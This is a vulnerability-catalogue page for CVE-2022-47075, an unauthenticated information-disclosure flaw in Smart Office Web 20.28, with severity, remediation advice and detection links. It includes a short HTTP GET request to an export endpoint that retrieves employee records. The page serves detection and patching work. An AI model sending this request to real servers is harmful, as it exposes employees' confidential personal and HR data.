🔙 목록으로 돌아가기

CVE-2022-47075: Smart Office Web 20.28 - Information Disclosure

TitleSmart Office Web 20.28 - Information Disclosure
Authorr3Y3r53
SeverityHigh
ImpactUnauthenticated attackers can download sensitive employee information including personal details, employee codes, and reporting relationships through vulnerable export endpoints in Smart Office Web, potentially exposing confidential HR data.
RemediationUpgrade to a version of Smart Office Web later than 20.28 that implements proper authentication checks on export endpoints.
CVSS Score7.5
EPSS Score0.92526
CVE IDCVE-2022-47075
Tags cve cve2022 packetstorm smart-office info exposure smartofficepayroll vkev vuln

🔍 Vulnerability Description

An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.

🌐 HTTP Request

GET /ExportReportingManager.aspx HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47075.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-47075.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A